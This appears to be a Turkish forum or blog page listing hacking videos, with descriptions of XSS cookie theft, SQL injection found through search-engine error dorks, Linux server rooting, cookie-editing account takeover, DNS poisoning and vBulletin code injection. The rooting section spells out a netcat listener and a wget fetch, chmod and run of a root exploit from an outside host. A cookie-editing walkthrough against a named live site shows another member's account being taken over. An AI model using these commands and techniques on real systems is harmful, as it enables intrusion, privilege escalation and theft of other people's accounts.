• XSS’ye Basit Giriş

Xss açıkları hakkında temel oluşturacak basit xss yönetimin anlatıldığı 2 videoyu paylaşacağım sizlerle.  İlk videoda XSS açığının bulunduğu sayfa tespit ediliyor. İkinci XSS videosunda ise bulunan açığın lehimize nasıl çevirebileceğimiz anlatılmış. PM. yolu ile gönderilen xss linki karşı tarafın tıklaması sonucu Cookie Sniffer aracılığıyla saldırganın eline geçmekte ve cookie editör leriyle gelen cookieleri kendikileriyle değiştirmekte ve karşı tarafın accountunu ele geçirmekte.

XSS Video Download

• Linux Server Hacking

Linux Server Hack ediliş videosu. Yetki kısıtlaması olmayan linux serverlarda dizin atlayarak (bypass edilerek) flashhaber.com.tr’nin yazılabilir bir dizinine index dosyası yazdırılıyor. Videoda /var/mail dizininden username alındıktan sonra o kullanıcı adının hangi domaine ait olduğunu öğrenmek için /var/named dizininden alınıyor sonuç olarak amaca ulaşılıyor.

Linux Server Hacking Video Download

• PostgreSQL Sql Injection

Veritabanı olarak PostgreSQL kullanan sistemlerde sql injection olayının nasıl uygulandığını anlatan bir video. Videoda “supplied argument is not a valid PostgreSQL result” hata cümlesi google arama motorundan  aratılmış ve google un indexlediği sql (PostgreSQL) hatası veren siteler listenledikten sonra sql inject uygulanarak veritabanından veri çekildiği gösterilmiş.

PostgreSQL Sql Injection Video Download

• Linux Server Root

Linux Server Root işlemi yaparken kernele uygun exploit, backconnect tool’lar, netcat ve servera bağlanmak için açık bir porta ihtiyacınız vardır. System32 ye atılmışsa netcat dosyaları msdos’a girip nc -vv -l -p [port] yazmanız yeterli. Eğer System32 ye kopyalanmamışsa netcat pc de bulundugu dizine gidilmeli msdos tan sonra server a bağlanmak için komut yazılmalı. Server’a bağlandıktan sonra yazılabilir bir dizine wget fetch curl GET vs komutlarla exploitimizi çekeriz. ( wget http://www.lmfrf.org/rootexploit ) daha sonra full yetki vermemiz gerek server’a çektiğimiz exploite (chmod 777 rootexploit). yaptıktan sonra geriye exploiti çalıştırmak kalıyor. ./rootexploit  <—–<< ßu i$lem ßiraz uzun sürebilir, bazende çalışmayabilir her server rootlanır diye birşey yoktur rootlanmayacak serverda yoktur. Sıra kontrol etmeye geldi “id” komutunu kullanarak serverdaki yetkimize bakarız “uid=0(root) gid=0(root) groups=0(root)” gibiyse yetkiniz root olmuşsunuzdur yok değilse işlem başarısız olmuştur.

Linux Server Root Video Download

• Mysql Blind Sql Injection

Blind Sql Injection’a basit bir örnek. Video da ilk başta mysqlbf tools ile localhost üzerinde blindinjection atak yapıldı. Sonra ise blind injectionun mantığını anlatıldı.

Blind Sql Injection Video Download

• Cookie Edit & Hack

Cookie Handling yönteminin anlatıldığı bir video. Çerezler değiştirilerek başka user veya admin yetkisi alınıyor.
Videodaki yazılar :

———————–

Anlatacagım yontem Cookie Edit.

videoda şunu Anlatacam : siteye login olduktan sonra kendi cookielerimizi editleyerek nasıl

Başka uyelerin nasıl girecegimizi gosterecem…

opera kullanmanızı oneririm cunku cookieleri duzenleyeBiliyoruz kolay Bi şekilde. opera

yoksa cookie editor programınıda kullanaBilirsiniz…

neySe Başlayalım …

Hedef : www.mafya.gen.tr

Ben Siteye uye olmuştum. şimdi giriş yapacam

uye adımız : Cookie

Seviye: Kapkaççı     Sağlık: 100 %     Para: $1,500
Silah: Silah Yok(0 Mermi)     Koruma: Koruma Yok     Bölge: Rusya

Bunlarda oyundaki Bilgilerimiz…

LaW_Bell - hero38 - Samsei - thegodfather - bigBOSS - Matmtkci - enes_del - ACGuray -

don_juan - BOZKURT - sauannaı2 - abosh - noslu - d4rkz - deccal - thehocca - sahinsah -

nightmare - Cookie -

şuan online olan uyelerde Bunlar Bunlardan herhangi Birinin uye adıyla login olacaz

cookielerimizi editleyip…

d4rkz

adlı uye olarak degişecez cookielerimizi şimdi hem sitede yoneticiymiş (:

cookielerden uye adımız olan Cookie yi d4rkz olarak degiştirdik.
şimdi Sayfayı yenileyelim Bakalım olmuşmu ?

d4rkz
Seviye: Eroin Satıcısı     Sağlık: 100 %     Para: $593,087
Silah: Tabanca (0 Mermi)     Koruma: Koruma Yok     Bölge: Fransa

Cookie
Seviye: Kapkaççı     Sağlık: 100 %     Para: $1,500
Silah: Silah Yok(0 Mermi)     Koruma: Koruma Yok     Bölge: Rusya

evet gordugunu giBi şuan d4rkz adlı uyenin panelindeyiz. Bu Bir adminde olaBilir Başka Bir

uyede.

Anlatacaklarım Bu kadar işinize yarar umarım…

————————–

Cookie Edit & Hack Video Download

• Access Sql Injection

Access kullanan sistemlerde basit sql injection yöntemi. Union kullanılarak kendi sql sorgusunu dahil edip veritabanından kullanıcı adları ve kullanıcı şifreleri çekilmekte. Bu yöntemde tablo ve column lar Brute-Force (Deneme/Yanılma) şeklinde bulunuyor.

Access Sql Injection Video Download

• Dns Cache Poisoning

Dns Cache Poisening ile girilen sitenin başka bir siteye yonlendirilmesi anlatılmış. Eskiden çok yaygın olan bir Pishing yöntemi.

Dns Cache Poisoning Video Download

• Vbulletin Php Code Inject

Vbullettin forumlarda admin panele girdikten sonra plugin ekleyerek RFI ( Remote File Inclusion) açığı nasıl oluşturulacağı anlatılmış. Bu Oluşan açıkla rahatlıkla dizinlerdeki dosya ve klasorleri erişebiliyor. Başarılı güzel bir yöntem.

Vbulletin Php Code Inject Video Download

• Linux Server Safe Mode Bypass

Cgi-Telnet ile Safe Mode On (Güvenlik Modu : Açık) Linux Server’ın Güvenliğini aşıp izni olmayan dizinler listeleniyor. Bypass ile Backconnect, Execute Command mümkün kılınıyor.

Linux Server Safe Mode Bypass Video Download